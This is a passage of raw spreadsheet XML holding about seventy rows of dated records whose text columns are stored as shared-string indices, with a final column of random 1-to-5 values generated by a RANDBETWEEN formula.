      <c r="F3482">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3483" s="1">
        <v>43493.500381944446</v>
      </c>
      <c r="B3483" t="s">
        <v>19</v>
      </c>
      <c r="C3483" t="s">
        <v>10</v>
      </c>
      <c r="D3483" t="s">
        <v>6</v>
      </c>
      <c r="E3483" t="s">
        <v>3390</v>
      </c>
      <c r="F3483">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3484" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3484" s="1">
        <v>43493.498668981483</v>
      </c>
      <c r="B3484" t="s">
        <v>5</v>
      </c>
      <c r="C3484" t="s">
        <v>10</v>
      </c>
      <c r="D3484" t="s">
        <v>158</v>
      </c>
      <c r="E3484" s="2" t="s">
        <v>3391</v>
      </c>
      <c r="F3484">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3485" s="1">
        <v>43493.497835648152</v>
      </c>
      <c r="B3485" t="s">
        <v>19</v>
      </c>
      <c r="C3485" t="s">
        <v>10</v>
      </c>
      <c r="D3485" t="s">
        <v>290</v>
      </c>
      <c r="E3485" t="s">
        <v>3392</v>
      </c>
      <c r="F3485">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3486" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3486" s="1">
        <v>43493.485277777778</v>
      </c>
      <c r="B3486" t="s">
        <v>13</v>
      </c>
      <c r="C3486" t="s">
        <v>197</v>
      </c>
      <c r="E3486" s="2" t="s">
        <v>3393</v>
      </c>
      <c r="F3486">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3487" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3487" s="1">
        <v>43493.473645833335</v>
      </c>
      <c r="B3487" t="s">
        <v>13</v>
      </c>
      <c r="C3487" t="s">
        <v>10</v>
      </c>
      <c r="D3487" t="s">
        <v>17</v>
      </c>
      <c r="E3487" s="2" t="s">
        <v>3394</v>
      </c>
      <c r="F3487">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3488" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3488" s="1">
        <v>43493.466145833336</v>
      </c>
      <c r="B3488" t="s">
        <v>13</v>
      </c>
      <c r="C3488" t="s">
        <v>6</v>
      </c>
      <c r="D3488" t="s">
        <v>25</v>
      </c>
      <c r="E3488" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="F3488">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3489" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3489" s="1">
        <v>43493.465127314812</v>
      </c>
      <c r="B3489" t="s">
        <v>19</v>
      </c>
      <c r="C3489" t="s">
        <v>734</v>
      </c>
      <c r="E3489" s="2" t="s">
        <v>3396</v>
      </c>
      <c r="F3489">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3490" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3490" s="1">
        <v>43493.463495370372</v>
      </c>
      <c r="B3490" t="s">
        <v>19</v>
      </c>
      <c r="C3490" t="s">
        <v>71</v>
      </c>
      <c r="E3490" s="2" t="s">
        <v>3397</v>
      </c>
      <c r="F3490">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3491" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3491" s="1">
        <v>43493.4533912037</v>
      </c>
      <c r="B3491" t="s">
        <v>1305</v>
      </c>
      <c r="C3491" t="s">
        <v>6</v>
      </c>
      <c r="D3491" t="s">
        <v>194</v>
      </c>
      <c r="E3491" t="s">
        <v>3398</v>
      </c>
      <c r="F3491">
        <f t="shared" ca="1" si="54"/>
        <v>5</v>
      </c>
    </row>
    <row r="3492" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3492" s="1">
        <v>43493.447905092595</v>
      </c>
      <c r="B3492" t="s">
        <v>13</v>
      </c>
      <c r="C3492" t="s">
        <v>10</v>
      </c>
      <c r="D3492" t="s">
        <v>41</v>
      </c>
      <c r="E3492" s="2" t="s">
        <v>3399</v>
      </c>
      <c r="F3492">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3493" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3493" s="1">
        <v>43493.447812500002</v>
      </c>
      <c r="B3493" t="s">
        <v>5</v>
      </c>
      <c r="C3493" t="s">
        <v>10</v>
      </c>
      <c r="D3493" t="s">
        <v>6</v>
      </c>
      <c r="E3493" s="2" t="s">
        <v>3400</v>
      </c>
      <c r="F3493">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3494" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3494" s="1">
        <v>43493.445474537039</v>
      </c>
      <c r="B3494" t="s">
        <v>19</v>
      </c>
      <c r="C3494" t="s">
        <v>10</v>
      </c>
      <c r="D3494" t="s">
        <v>163</v>
      </c>
      <c r="E3494" t="s">
        <v>3401</v>
      </c>
      <c r="F3494">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3495" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3495" s="1">
        <v>43493.441180555557</v>
      </c>
      <c r="B3495" t="s">
        <v>19</v>
      </c>
      <c r="C3495" t="s">
        <v>65</v>
      </c>
      <c r="E3495" s="2" t="s">
        <v>3402</v>
      </c>
      <c r="F3495">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3496" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3496" s="1">
        <v>43493.440474537034</v>
      </c>
      <c r="B3496" t="s">
        <v>5</v>
      </c>
      <c r="C3496" t="s">
        <v>82</v>
      </c>
      <c r="E3496" t="s">
        <v>3403</v>
      </c>
      <c r="F3496">
        <f t="shared" ca="1" si="54"/>
        <v>5</v>
      </c>
    </row>
    <row r="3497" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3497" s="1">
        <v>43493.434340277781</v>
      </c>
      <c r="B3497" t="s">
        <v>1305</v>
      </c>
      <c r="C3497" t="s">
        <v>6</v>
      </c>
      <c r="D3497" t="s">
        <v>25</v>
      </c>
      <c r="E3497" s="2" t="s">
        <v>3404</v>
      </c>
      <c r="F3497">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3498" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A3498" s="1">
        <v>43493.431875000002</v>
      </c>
      <c r="B3498" t="s">
        <v>5</v>
      </c>
      <c r="C3498" t="s">
        <v>1501</v>
      </c>
      <c r="E3498" s="2" t="s">
        <v>3405</v>
      </c>
      <c r="F3498">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3499" s="1">
        <v>43493.426030092596</v>
      </c>
      <c r="B3499" t="s">
        <v>1305</v>
      </c>
      <c r="C3499" t="s">
        <v>10</v>
      </c>
      <c r="D3499" t="s">
        <v>885</v>
      </c>
      <c r="E3499" t="s">
        <v>3406</v>
      </c>
      <c r="F3499">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3500" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3500" s="1">
        <v>43493.421689814815</v>
      </c>
      <c r="B3500" t="s">
        <v>1305</v>
      </c>
      <c r="C3500" t="s">
        <v>408</v>
      </c>
      <c r="E3500" s="2" t="s">
        <v>3407</v>
      </c>
      <c r="F3500">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3501" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3501" s="1">
        <v>43493.418495370373</v>
      </c>
      <c r="B3501" t="s">
        <v>19</v>
      </c>
      <c r="C3501" t="s">
        <v>173</v>
      </c>
      <c r="E3501" s="2" t="s">
        <v>3408</v>
      </c>
      <c r="F3501">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3502" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3502" s="1">
        <v>43493.407592592594</v>
      </c>
      <c r="B3502" t="s">
        <v>5</v>
      </c>
      <c r="C3502" t="s">
        <v>10</v>
      </c>
      <c r="D3502" t="s">
        <v>17</v>
      </c>
      <c r="E3502" t="s">
        <v>3409</v>
      </c>
      <c r="F3502">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3503" s="1">
        <v>43493.405729166669</v>
      </c>
      <c r="B3503" t="s">
        <v>1305</v>
      </c>
      <c r="C3503" t="s">
        <v>10</v>
      </c>
      <c r="D3503" t="s">
        <v>263</v>
      </c>
      <c r="E3503" t="s">
        <v>3410</v>
      </c>
      <c r="F3503">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3504" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3504" s="1">
        <v>43493.402233796296</v>
      </c>
      <c r="B3504" t="s">
        <v>13</v>
      </c>
      <c r="C3504" t="s">
        <v>222</v>
      </c>
      <c r="E3504" t="s">
        <v>3411</v>
      </c>
      <c r="F3504">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3505" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3505" s="1">
        <v>43493.389594907407</v>
      </c>
      <c r="B3505" t="s">
        <v>19</v>
      </c>
      <c r="C3505" t="s">
        <v>10</v>
      </c>
      <c r="D3505" t="s">
        <v>89</v>
      </c>
      <c r="E3505" s="2" t="s">
        <v>3412</v>
      </c>
      <c r="F3505">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3506" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3506" s="1">
        <v>43493.378923611112</v>
      </c>
      <c r="B3506" t="s">
        <v>19</v>
      </c>
      <c r="C3506" t="s">
        <v>471</v>
      </c>
      <c r="E3506" s="2" t="s">
        <v>3413</v>
      </c>
      <c r="F3506">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3507" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A3507" s="1">
        <v>43493.372974537036</v>
      </c>
      <c r="B3507" t="s">
        <v>5</v>
      </c>
      <c r="C3507" t="s">
        <v>10</v>
      </c>
      <c r="D3507" t="s">
        <v>14</v>
      </c>
      <c r="E3507" s="2" t="s">
        <v>3414</v>
      </c>
      <c r="F3507">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3508" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3508" s="1">
        <v>43493.369537037041</v>
      </c>
      <c r="B3508" t="s">
        <v>19</v>
      </c>
      <c r="C3508" t="s">
        <v>48</v>
      </c>
      <c r="E3508" s="2" t="s">
        <v>3415</v>
      </c>
      <c r="F3508">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3509" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A3509" s="1">
        <v>43493.3049537037</v>
      </c>
      <c r="B3509" t="s">
        <v>5</v>
      </c>
      <c r="C3509" t="s">
        <v>48</v>
      </c>
      <c r="E3509" s="2" t="s">
        <v>3416</v>
      </c>
      <c r="F3509">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3510" s="1">
        <v>43493.304282407407</v>
      </c>
      <c r="B3510" t="s">
        <v>5</v>
      </c>
      <c r="C3510" t="s">
        <v>67</v>
      </c>
      <c r="E3510" t="s">
        <v>3417</v>
      </c>
      <c r="F3510">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3511" s="1">
        <v>43493.287465277775</v>
      </c>
      <c r="B3511" t="s">
        <v>35</v>
      </c>
      <c r="C3511" t="s">
        <v>1130</v>
      </c>
      <c r="E3511" t="s">
        <v>3418</v>
      </c>
      <c r="F3511">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3512" s="1">
        <v>43493.264386574076</v>
      </c>
      <c r="B3512" t="s">
        <v>19</v>
      </c>
      <c r="C3512" t="s">
        <v>776</v>
      </c>
      <c r="E3512" t="s">
        <v>3419</v>
      </c>
      <c r="F3512">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3513" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3513" s="1">
        <v>43493.263206018521</v>
      </c>
      <c r="B3513" t="s">
        <v>19</v>
      </c>
      <c r="C3513" t="s">
        <v>48</v>
      </c>
      <c r="E3513" s="2" t="s">
        <v>3420</v>
      </c>
      <c r="F3513">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3514" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3514" s="1">
        <v>43493.211574074077</v>
      </c>
      <c r="B3514" t="s">
        <v>5</v>
      </c>
      <c r="C3514" t="s">
        <v>6</v>
      </c>
      <c r="D3514" t="s">
        <v>25</v>
      </c>
      <c r="E3514" t="s">
        <v>3421</v>
      </c>
      <c r="F3514">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3515" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3515" s="1">
        <v>43493.204189814816</v>
      </c>
      <c r="B3515" t="s">
        <v>5</v>
      </c>
      <c r="C3515" t="s">
        <v>41</v>
      </c>
      <c r="E3515" t="s">
        <v>3422</v>
      </c>
      <c r="F3515">
        <f t="shared" ca="1" si="54"/>
        <v>5</v>
      </c>
    </row>
    <row r="3516" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3516" s="1">
        <v>43493.19394675926</v>
      </c>
      <c r="B3516" t="s">
        <v>35</v>
      </c>
      <c r="C3516" t="s">
        <v>71</v>
      </c>
      <c r="E3516" s="2" t="s">
        <v>3423</v>
      </c>
      <c r="F3516">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3517" s="1">
        <v>43493.192476851851</v>
      </c>
      <c r="B3517" t="s">
        <v>35</v>
      </c>
      <c r="C3517" t="s">
        <v>118</v>
      </c>
      <c r="E3517" t="s">
        <v>3424</v>
      </c>
      <c r="F3517">
        <f t="shared" ca="1" si="54"/>
        <v>5</v>
      </c>
    </row>
    <row r="3518" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3518" s="1">
        <v>43493.190960648149</v>
      </c>
      <c r="B3518" t="s">
        <v>19</v>
      </c>
      <c r="C3518" t="s">
        <v>124</v>
      </c>
      <c r="D3518" t="s">
        <v>312</v>
      </c>
      <c r="E3518" s="2" t="s">
        <v>3425</v>
      </c>
      <c r="F3518">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3519" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3519" s="1">
        <v>43493.180196759262</v>
      </c>
      <c r="B3519" t="s">
        <v>19</v>
      </c>
      <c r="C3519" t="s">
        <v>124</v>
      </c>
      <c r="F3519">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3520" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3520" s="1">
        <v>43493.174085648148</v>
      </c>
      <c r="B3520" t="s">
        <v>5</v>
      </c>
      <c r="C3520" t="s">
        <v>41</v>
      </c>
      <c r="E3520" t="s">
        <v>3426</v>
      </c>
      <c r="F3520">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3521" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3521" s="1">
        <v>43493.161481481482</v>
      </c>
      <c r="B3521" t="s">
        <v>5</v>
      </c>
      <c r="C3521" t="s">
        <v>408</v>
      </c>
      <c r="E3521" s="2" t="s">
        <v>3427</v>
      </c>
      <c r="F3521">
        <f t="shared" ca="1" si="54"/>
        <v>5</v>
      </c>
    </row>
    <row r="3522" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3522" s="1">
        <v>43493.140856481485</v>
      </c>
      <c r="B3522" t="s">
        <v>13</v>
      </c>
      <c r="C3522" t="s">
        <v>314</v>
      </c>
      <c r="E3522" t="s">
        <v>3428</v>
      </c>
      <c r="F3522">
        <f t="shared" ref="F3522:F3585" ca="1" si="55">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="3523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3523" s="1">
        <v>43493.131701388891</v>
      </c>
      <c r="B3523" t="s">
        <v>19</v>
      </c>
      <c r="C3523" t="s">
        <v>60</v>
      </c>
      <c r="E3523" t="s">
        <v>3429</v>
      </c>
      <c r="F3523">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3524" s="1">
        <v>43493.086909722224</v>
      </c>
      <c r="B3524" t="s">
        <v>1305</v>
      </c>
      <c r="C3524" t="s">
        <v>226</v>
      </c>
      <c r="E3524" t="s">
        <v>3430</v>
      </c>
      <c r="F3524">
        <f t="shared" ca="1" si="55"/>
        <v>2</v>
      </c>
    </row>
    <row r="3525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3525" s="1">
        <v>43493.052476851852</v>
      </c>
      <c r="B3525" t="s">
        <v>5</v>
      </c>
      <c r="C3525" t="s">
        <v>2745</v>
      </c>
      <c r="D3525" t="s">
        <v>107</v>
      </c>
      <c r="E3525" t="s">
        <v>3431</v>
      </c>
      <c r="F3525">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3526" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3526" s="1">
        <v>43492.943113425928</v>
      </c>
      <c r="B3526" t="s">
        <v>19</v>
      </c>
      <c r="C3526" t="s">
        <v>10</v>
      </c>
      <c r="D3526" t="s">
        <v>667</v>
      </c>
      <c r="E3526" t="s">
        <v>3432</v>
      </c>
      <c r="F3526">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3527" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A3527" s="1">
        <v>43492.911736111113</v>
      </c>
      <c r="B3527" t="s">
        <v>13</v>
      </c>
      <c r="C3527" t="s">
        <v>10</v>
      </c>
      <c r="D3527" t="s">
        <v>6</v>
      </c>
      <c r="E3527" s="2" t="s">
        <v>3433</v>
      </c>
      <c r="F3527">
        <f t="shared" ca="1" si="55"/>
        <v>3</v>
      </c>
    </row>
    <row r="3528" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3528" s="1">
        <v>43492.876747685186</v>
      </c>
      <c r="B3528" t="s">
        <v>13</v>
      </c>
      <c r="C3528" t="s">
        <v>73</v>
      </c>
      <c r="E3528" t="s">
        <v>3434</v>
      </c>
      <c r="F3528">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3529" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3529" s="1">
        <v>43492.853206018517</v>
      </c>
      <c r="B3529" t="s">
        <v>1305</v>
      </c>
      <c r="C3529" t="s">
        <v>6</v>
      </c>
      <c r="D3529" t="s">
        <v>25</v>
      </c>
      <c r="E3529" t="s">
        <v>3435</v>
      </c>
      <c r="F3529">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3530" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3530" s="1">
        <v>43492.802615740744</v>
      </c>
      <c r="B3530" t="s">
        <v>13</v>
      </c>
      <c r="C3530" t="s">
        <v>10</v>
      </c>
      <c r="D3530" t="s">
        <v>192</v>
      </c>
      <c r="E3530" s="2" t="s">
        <v>3436</v>
      </c>
      <c r="F3530">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3531" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3531" s="1">
        <v>43492.802106481482</v>
      </c>
      <c r="B3531" t="s">
        <v>35</v>
      </c>
      <c r="C3531" t="s">
        <v>144</v>
      </c>
      <c r="E3531" s="2" t="s">
        <v>3437</v>
      </c>
      <c r="F3531">
        <f t="shared" ca="1" si="55"/>
        <v>3</v>
      </c>
    </row>
    <row r="3532" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3532" s="1">
        <v>43492.797638888886</v>
      </c>
      <c r="B3532" t="s">
        <v>13</v>
      </c>
      <c r="C3532" t="s">
        <v>10</v>
      </c>
      <c r="D3532" t="s">
        <v>192</v>
      </c>
      <c r="E3532" s="2" t="s">
        <v>3438</v>
      </c>
      <c r="F3532">
        <f t="shared" ca="1" si="55"/>
        <v>3</v>
      </c>
    </row>
    <row r="3533" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3533" s="1">
        <v>43492.698553240742</v>
      </c>
      <c r="B3533" t="s">
        <v>5</v>
      </c>
      <c r="C3533" t="s">
        <v>124</v>
      </c>
      <c r="E3533" s="2" t="s">
        <v>3439</v>
      </c>
      <c r="F3533">
        <f t="shared" ca="1" si="55"/>
        <v>4</v>
      </c>
    </row>
    <row r="3534" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3534" s="1">
        <v>43492.667743055557</v>
      </c>
      <c r="B3534" t="s">
        <v>35</v>
      </c>
      <c r="C3534" t="s">
        <v>16</v>
      </c>
      <c r="E3534" t="s">
        <v>3440</v>
      </c>
      <c r="F3534">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3535" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3535" s="1">
        <v>43492.486273148148</v>
      </c>
      <c r="B3535" t="s">
        <v>19</v>
      </c>
      <c r="C3535" t="s">
        <v>10</v>
      </c>
      <c r="D3535" t="s">
        <v>52</v>
      </c>
      <c r="E3535" t="s">
        <v>3441</v>
      </c>
      <c r="F3535">
        <f t="shared" ca="1" si="55"/>
        <v>3</v>
      </c>
    </row>
    <row r="3536" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3536" s="1">
        <v>43492.438692129632</v>
      </c>
      <c r="B3536" t="s">
        <v>5</v>
      </c>
      <c r="C3536" t="s">
        <v>10</v>
      </c>
      <c r="D3536" t="s">
        <v>36</v>
      </c>
      <c r="E3536" t="s">
        <v>3442</v>
      </c>
      <c r="F3536">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3537" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3537" s="1">
        <v>43492.430868055555</v>
      </c>
      <c r="B3537" t="s">
        <v>35</v>
      </c>
      <c r="C3537" t="s">
        <v>3443</v>
      </c>
      <c r="E3537" t="s">
        <v>2519</v>
      </c>
      <c r="F3537">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3538" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3538" s="1">
        <v>43492.388368055559</v>
      </c>
      <c r="B3538" t="s">
        <v>13</v>
      </c>
      <c r="C3538" t="s">
        <v>2745</v>
      </c>
      <c r="E3538" t="s">
        <v>3444</v>
      </c>
      <c r="F3538">
        <f t="shared" ca="1" si="55"/>
        <v>2</v>
      </c>
    </row>
    <row r="3539" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3539" s="1">
        <v>43492.270358796297</v>
      </c>
      <c r="B3539" t="s">
        <v>19</v>
      </c>
      <c r="C3539" t="s">
        <v>41</v>
      </c>
      <c r="F3539">
        <f t="shared" ca="1" si="55"/>
        <v>4</v>
      </c>
    </row>
    <row r="3540" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3540" s="1">
        <v>43492.260717592595</v>
      </c>
      <c r="B3540" t="s">
        <v>5</v>
      </c>
      <c r="C3540" t="s">
        <v>60</v>
      </c>
      <c r="E3540" t="s">
        <v>3446</v>
      </c>
      <c r="F3540">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3541" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A3541" s="1">
        <v>43492.221851851849</v>
      </c>
      <c r="B3541" t="s">
        <v>13</v>
      </c>
      <c r="C3541" t="s">
        <v>318</v>
      </c>
      <c r="E3541" s="2" t="s">
        <v>3447</v>
      </c>
      <c r="F3541">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3542" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3542" s="1">
        <v>43492.143657407411</v>
      </c>
      <c r="B3542" t="s">
        <v>1305</v>
      </c>
      <c r="C3542" t="s">
        <v>48</v>
      </c>
      <c r="E3542" s="2" t="s">
        <v>3448</v>
      </c>
      <c r="F3542">
        <f t="shared" ca="1" si="55"/>
        <v>5</v>
      </c>
    </row>
    <row r="3543" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3543" s="1">
        <v>43492.131932870368</v>
      </c>
      <c r="B3543" t="s">
        <v>19</v>
      </c>
      <c r="C3543" t="s">
        <v>226</v>
      </c>
      <c r="E3543" t="s">
        <v>3449</v>
      </c>
      <c r="F3543">
        <f t="shared" ca="1" si="55"/>
        <v>5</v>
      </c>
    </row>
    <row r="3544" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3544" s="1">
        <v>43491.95212962963</v>
      </c>
      <c r="B3544" t="s">
        <v>1305</v>
      </c>
      <c r="C3544" t="s">
        <v>41</v>
      </c>
      <c r="E3544" s="2" t="s">
        <v>3450</v>
      </c>
      <c r="F3544">
        <f t="shared" ca="1" si="55"/>
        <v>3</v>
      </c>
    </row>
    <row r="3545" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A3545" s="1">
        <v>43491.768773148149</v>
      </c>
      <c r="B3545" t="s">
        <v>35</v>
      </c>
      <c r="C3545" t="s">
        <v>10</v>
      </c>
      <c r="D3545" t="s">
        <v>6</v>
      </c>
      <c r="E3545" s="2" t="s">
        <v>3451</v>
      </c>
      <c r="F3545">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3546" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3546" s="1">
        <v>43491.614166666666</v>
      </c>
      <c r="B3546" t="s">
        <v>19</v>
      </c>
      <c r="C3546" t="s">
        <v>92</v>
      </c>
      <c r="E3546" s="2" t="s">
        <v>3452</v>
      </c>
      <c r="F3546">
        <f t="shared" ca="1" si="55"/>
        <v>2</v>
      </c>
    </row>
    <row r="3547" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A3547" s="1">
        <v>43491.606550925928</v>
      </c>
      <c r="B3547" t="s">
        <v>5</v>
      </c>
      <c r="C3547" t="s">
        <v>471</v>
      </c>
      <c r="E3547" s="2" t="s">
        <v>3453</v>
      </c>
      <c r="F3547">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3548" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3548" s="1">
        <v>43491.600358796299</v>
      </c>
      <c r="B3548" t="s">
        <v>19</v>
      </c>
      <c r="C3548" t="s">
        <v>260</v>
      </c>
      <c r="E3548" s="2" t="s">
        <v>3454</v>
      </c>
      <c r="F3548">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3549" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3549" s="1">
        <v>43491.593506944446</v>
      </c>
      <c r="B3549" t="s">
        <v>19</v>
      </c>
      <c r="C3549" t="s">
        <v>260</v>
      </c>
      <c r="E3549" s="2" t="s">
        <v>3455</v>
      </c>
      <c r="F3549">
        <f t="shared" ca="1" si="55"/>
        <v>2</v>
      </c>
    </row>
    <row r="3550" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3550" s="1">
        <v>43491.589189814818</v>
      </c>
      <c r="B3550" t="s">
        <v>19</v>
      </c>
      <c r="C3550" t="s">
        <v>260</v>
      </c>
      <c r="E3550" s="2" t="s">
        <v>3456</v>
      </c>
      <c r="F3550">
        <f t="shared" ca="1" si="55"/>
        <v>1</v>
      </c>
    </row>
    <row r="3551" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3551" s="1">
        <v>43491.484768518516</v>
      </c>
      <c r="B3551" t="s">
        <v>5</v>
      </c>
      <c r="C3551" t="s">
        <v>3457</v>
      </c>
      <c r="F3551">
        <f t="shared" ca="1" si="55"/>
        <v>3</v>
      </c>
    </row>
    <row r="3552" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3552" s="1">
        <v>43491.447384259256</v>
      </c>
      <c r="B3552" t="s">
        <v>5</v>
      </c>
      <c r="C3552" t="s">
        <v>124</v>
      </c>
      <c r="E3552" s="2" t="s">
        <v>3458</v>
      </c>
      <c r="F3552">
        <f t="shared" ca="1" si="55"/>
        <v>2</v>
      </c>
    </row>
